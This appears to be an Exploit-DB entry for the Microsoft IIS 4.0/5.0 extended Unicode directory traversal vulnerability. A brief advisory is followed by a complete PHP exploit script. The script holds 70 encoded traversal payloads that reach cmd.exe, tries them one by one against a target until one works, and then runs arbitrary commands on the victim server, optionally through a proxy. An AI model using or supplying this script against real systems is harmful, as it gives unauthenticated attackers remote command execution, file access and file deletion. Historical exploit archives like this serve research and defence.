Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (4)

EDB-ID:

20301

Author:

BoloTron

Type:

remote

Platform:

Windows

Published:

2000-10-17

source: http://www.securityfocus.com/bid/1806/info
 
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
 
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
 
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
 
This is the vulnerability exploited by the Code Blue Worm.
 
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.

#!php -q
<?

$vector_ataque[0]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[1]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[2]="/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[3]="/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[4]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[5]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[6]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[7]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[8]="/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[9]="/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[10]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[11]="/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[12]="/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[13]="/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[14]="/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[15]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[16]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[17]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[18]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[19]="/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[20]="/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[21]="/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[22]="/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[23]="/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[24]="/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[25]="/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[26]="/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[27]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[28]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[29]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[30]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[31]="/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[32]="/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[33]="/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[34]="/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[35]="/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[36]="/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";

$vector_ataque[37]="/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";

$vector_ataque[38]="/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";

$vector_ataque[39]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[40]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[41]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";

$vector_ataque[42]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";

$vector_ataque[43]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[44]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";

$vector_ataque[45]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";

$vector_ataque[46]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[47]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";

$vector_ataque[48]="/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[49]="/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[50]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[51]="/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[52]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";

$vector_ataque[53]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";

$vector_ataque[54]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";

$vector_ataque[55]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";

$vector_ataque[56]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";

$vector_ataque[57]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[58]="/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[59]="/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[60]="/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[61]="/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[62]="/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[63]="/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+";

$vector_ataque[64]="/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[65]="/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[66]="/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[67]="/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[68]="/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[69]="/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
        if(!isset($argv[1]))
        {
                echo

"\n\n--------------------------------------------------------------------\n";
                echo "------------- (c) UNICODE exploit for IIS 5.0/4.0 by BoloTron
------\n";
                echo
"--------------------------------------------------------------------\n\n";
                echo "Usage of the wicked device:\n";
                echo $argv[0]." -t www.victim.vic\n";
                echo $argv[0]." -t www.victim.vic -p proxy:port\n";
                echo $argv[0]."  www.victim.vic comand variant_number\n";
                echo $argv[0]." -p proxy:port www.victim.vic comand variant_number\n";
                echo "Options:\n";
                echo "-t --> Test the vulnerability (Try known variants till find the good
one)\n";
                echo "-p --> Attack through proxy\n";
                echo "\nUse Mode:\n1) Test the host and get the variants number in case
vulnerability exists\n";
                echo "2) Attack with command and variants number (optionaly you can use
proxy)\n";
                echo "Note : When you specify a command with spaces, replace spaces
with low script  \"_\" \n";
                echo "and you must double the backslash \"\\\". \n
Example".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
                echo "Thanks to An-tonio for the proxy support.\n";
                echo "Bug discover by Anonymous Post.\n";
                echo "TYPE ".$argv[0]." spanish, for Spanish help.\n";
        }
        else
        {
                if($argv[1]=="spanish")
                {
                echo
"\n\n--------------------------------------------------------------------\n";
                echo "------------- (c) Exploit UNICODE para IIS 5.0/4.0 por
BoloTron ----\n";
                echo
"--------------------------------------------------------------------\n\n";
                echo "Uso del artefacto maligno :\n";

                echo $argv[0]." -t www.victima.vic\n";
                echo $argv[0]." -t www.victima.vic -p proxy:puerto\n";
                echo $argv[0]."  www.victima.vic comando n�_de_variante\n";
                echo $argv[0]." -p proxy:port www.victima.vic comand
n�_de_variante\n";
                echo "Opciones:\n";
                echo "-t --> Testea la vulnerabilidad, prueba todas las
variantes hasta encontrar una buena.\n";
                echo "-p --> Ataque a traves de proxy\n";
                echo "\nModo de Empleo:\n1) Testear el host y anotar el
numero de variante en caso de ser vulnerable\n";
                echo "2) Atacar especificando comando y n� de variante
(opcionalmente puedes especificar un proxy)\n";
                echo "Nota : Cuando se especifica un comando en el que hay
espacios hay que sustituirlos por un guion bajo _ \n";
                echo "y las contrabarras hay que ponerlas dobles. \nEjemplo :
".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
                echo "Gracias a An-tonio por sus indicaciones en el soporte proxy.\n";
                echo "Bug descubierto por aviso anonimo.\n";
                exit;
                }
                if($argv[1]=="-t")
                {
                        if ($argv[3]=="-p")
                        {
                        for($i=0;$i<70;$i++)
                        {
                                $prox=explode(":",$argv[4]);
                                $comando="dir+c:\\";
                                $fp = fsockopen($prox[0], $prox[1]);
                                if(!$fp)
                                {
                                        echo "Conection failed...\n";
                                }
                                else
                                {
                                        fputs($fp,"GET
http://".$argv[2]."".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n");
                                        echo "Trying variant number ".$i." ";
                                        while(!feof($fp))
                                        {
                                                $resul=$resul.fgets($fp,128);
                                        }
                                        if (ereg("<DIR>", $resul))
                                        {
                                                echo "-----> Vulnerable!!\n";
                                                exit;
                                        }
                                        else
                                        {
                                                echo "-----> NoT Vulnerable
:(\n";
                                        }

                                }
                                fclose($fp);
                        }
                        }
                        else
                        {
                        for($i=0;$i<70;$i++)
                        {
                                $port=80;
                                $comando="dir+c:\\";
                                $fp = fsockopen($argv[2], $port);
                                if(!$fp)
                                {
                                        echo "Conection failed...\n";
                                }
                                else
                                {
                                        fputs($fp,"GET
".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n");
                                        echo "Trying variant number ".$i." ";
                                        while(!feof($fp))
                                        {
                                                $resul=$resul.fgets($fp,128);
                                        }
                                        if (ereg("<DIR>", $resul))
                                        {
                                                echo "-----> vulnerable!!\n";
                                                exit;
                                        }
                                        else
                                        {
                                                echo "-----> No Vulnerable :(\n";
                                        }

                                }
                                fclose($fp);
                        }
                        }
                }
                else
                {
                        if($argv[1]=="-p")
                        {
                                $prox=explode(":",$argv[2]);
                                $port=$prox[1];
                                $comando=ereg_replace("_","+",$argv[4]);
                                $fp = fsockopen($prox[0], $port);

                                if(!$fp)
                                {
                                        echo "Conection failed.\n";
                                }
                                else
                                {
                                        fputs($fp,"GET
http://".$argv[3]."".$vector_ataque[$argv[5]]."".$comando." HTTP/1.0\n\n");
                                        while(!feof($fp))
                                        {
                                                echo fgets($fp,128);
                                        }
                                }
                                fclose($fp);

                        }
                        else
                        {
                                $port=80;
                                $comando=ereg_replace("_","+",$argv[2]);
                                $fp = fsockopen($argv[1], $port);
                                if(!$fp)
                                {
                                        echo "Conection failed.\n";
                                }
                                else
                                {
                                        fputs($fp,"GET ".$vector_ataque[$argv[3]]."".$comando." HTTP/1.0\n\n");
                                        while(!feof($fp))
                                        {
                                                echo fgets($fp,128);
                                        }
                                }
                                fclose($fp);
                        }
                }




        }
?>